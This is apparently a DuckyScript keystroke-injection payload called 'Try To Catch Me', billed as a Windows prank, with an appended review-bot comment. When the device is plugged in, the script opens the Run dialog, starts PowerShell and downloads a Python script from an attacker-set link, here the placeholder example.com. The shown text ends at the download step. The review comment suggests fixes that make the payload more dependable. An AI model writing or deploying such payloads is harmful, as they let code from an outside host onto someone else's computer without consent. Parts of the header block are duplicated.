REM # Target : Windows 10/11 |
REM # |
REM ####################################
REM_BLOCK
####################################
# #
# Title : Try To Catch Me #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################
REM Requirements:
REM - Python
REM - Internet Connection
Requirements:
- Python
- Internet Connection
END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
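Review bot: this payload is the only one of the set that did not receive a detect-ready extension, so it still relies on a fixed `DELAY 1000` before `GUI r`; if the omission is deliberate, a REM line saying so would stop the next contributor from "fixing" it. The placeholder `DEFINE #SCRIPT-PY-LINK example.com` lacks a scheme, and `Invoke-WebRequest -Uri "#SCRIPT-PY-LINK"` rejects a relative URI, so the placeholder (here and in the sibling payloads that use the same define) should be written with `https://` to show users the expected form.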